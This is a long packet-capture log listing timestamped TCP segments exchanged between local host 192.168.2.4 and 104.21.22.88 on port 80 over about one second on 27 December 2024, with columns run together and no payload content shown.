                                    Dec 27, 2024 06:22:14.898176908 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.047753096 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.047909975 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.047971010 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.048166990 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.048293114 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.048356056 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.049191952 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.049299002 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.049364090 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.050168991 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.050312042 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.050368071 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.051194906 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.051248074 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.051300049 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.052155018 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.052272081 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.052320957 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.053150892 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.053261995 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.053313971 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.054136992 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.054266930 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.054321051 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.055154085 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.055279970 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.055358887 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.056143045 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.056338072 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.056386948 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.057120085 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.057292938 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.057343960 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.058195114 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.058304071 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.058357954 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.059151888 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.059245110 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.059303999 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.060132980 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.060250998 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.060302019 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.061126947 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.061304092 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.061362982 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.062118053 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.062362909 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.062419891 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.063107967 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.063251972 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.063309908 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.064094067 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.064228058 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.064282894 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.065119982 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.065155983 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.065201998 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.066112041 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.066235065 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.066284895 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.067091942 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.067307949 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.067353010 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.068134069 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.068275928 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.068340063 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.069111109 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.069228888 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.069295883 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.070089102 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.070220947 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.070287943 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.071079969 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.071209908 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.071271896 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.072103977 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.072227955 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.072297096 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.077074051 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.077164888 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.077200890 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.077229977 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.077331066 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.077364922 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.077385902 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.077416897 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.077452898 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.077461004 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.077584982 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.077619076 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.077651978 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.077653885 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.077699900 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.078054905 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.078207970 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.078265905 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.079073906 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.079183102 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.079238892 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.080063105 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.080182076 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.080235958 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.081043005 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.081190109 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.081248999 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.082051992 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.082190990 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.082257032 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.083043098 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.083168983 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.083220959 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.084028006 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.084165096 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.084228039 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.085028887 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.085155964 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.085218906 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.086030006 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.086144924 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.086201906 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.087034941 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.087136030 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.087198019 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.088028908 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.088160992 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.088223934 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.089025021 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.089134932 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.089195013 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.090013981 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.090137959 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.090198040 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.091034889 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.091139078 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.091202021 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.091994047 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.092152119 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.092209101 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.092999935 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.093180895 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.093239069 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.093985081 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.094120979 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.094173908 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.094983101 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.095107079 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.095179081 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.096036911 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.096194983 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.096259117 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.096988916 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.097129107 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.097188950 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.097986937 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.098114014 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.098174095 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.098980904 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.099106073 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.099167109 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.099946976 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.142718077 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.249315977 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.249468088 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.249538898 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.249744892 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.249862909 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.250767946 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.250818968 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.250890970 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.250957966 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.251756907 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.251872063 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.252017975 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.252754927 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.252861023 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.252924919 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.253751993 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.253842115 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.253906012 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.254740953 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.254873991 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.254933119 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.255733013 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.255939960 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.255999088 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.256720066 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.256961107 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.257026911 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.257718086 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.257838011 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.257900953 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.258704901 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.258830070 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.259114981 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.259721994 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.259854078 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.260163069 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.260696888 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.260816097 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.260989904 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.261682034 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.261797905 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.261857986 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.262706995 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.262794971 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.262895107 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.263699055 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.263813972 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.263879061 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.264692068 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.264822006 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.264897108 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.265686035 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.265808105 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.265885115 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.266676903 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.266788006 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.266884089 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.267678022 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.267815113 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.267874002 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.268656969 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.268775940 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.268842936 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.269653082 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.269812107 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.269876957 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.270648003 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.270766020 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.270832062 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.271650076 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.271780014 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.271841049 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.272634029 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.272780895 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.272840023 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.273650885 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.273780107 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.273853064 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.274636030 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.274758101 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.274902105 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.275649071 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.275789022 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.275849104 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.276643991 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.276743889 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.276804924 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.277636051 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.277724028 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.277801991 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.278642893 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.278713942 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.278770924 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.279601097 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.279711008 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.279777050 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.280611038 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.280795097 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.280853033 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.281599998 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.281717062 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.281786919 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.282617092 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.282782078 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.282836914 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.283577919 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.283698082 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.283756018 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.284579992 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.284698963 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.284759998 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.285589933 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.285686970 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.285746098 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.286570072 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.286672115 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.286727905 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.287559986 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.287717104 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.287771940 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.288578033 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.288676023 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.288733959 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.289551973 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.289670944 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.289858103 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.290574074 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.290689945 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.290745020 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.291577101 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.291690111 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.291778088 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.292563915 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.292676926 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.292731047 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.293570995 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.293664932 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.293741941 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.294538975 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.294668913 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.294801950 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.295567989 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.295661926 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.295715094 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.296582937 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.296701908 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.296756029 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.297538042 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.297652960 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.297755003 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.298537970 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.298643112 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.298713923 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.299529076 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.299634933 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.299710035 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.300530910 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.300663948 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.300723076 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.301497936 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.345855951 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.819289923 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.819329023 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.819349051 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.819396973 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.819505930 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.819523096 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.819547892 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.819564104 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.819578886 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.819608927 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.819816113 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.819833040 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.819861889 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.819879055 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.819883108 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.819886923 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.819904089 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.819920063 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.819930077 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.819930077 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.819936991 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.819952965 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.819956064 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.820002079 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.820569992 CET8049730104.21.22.88192.168.2.4
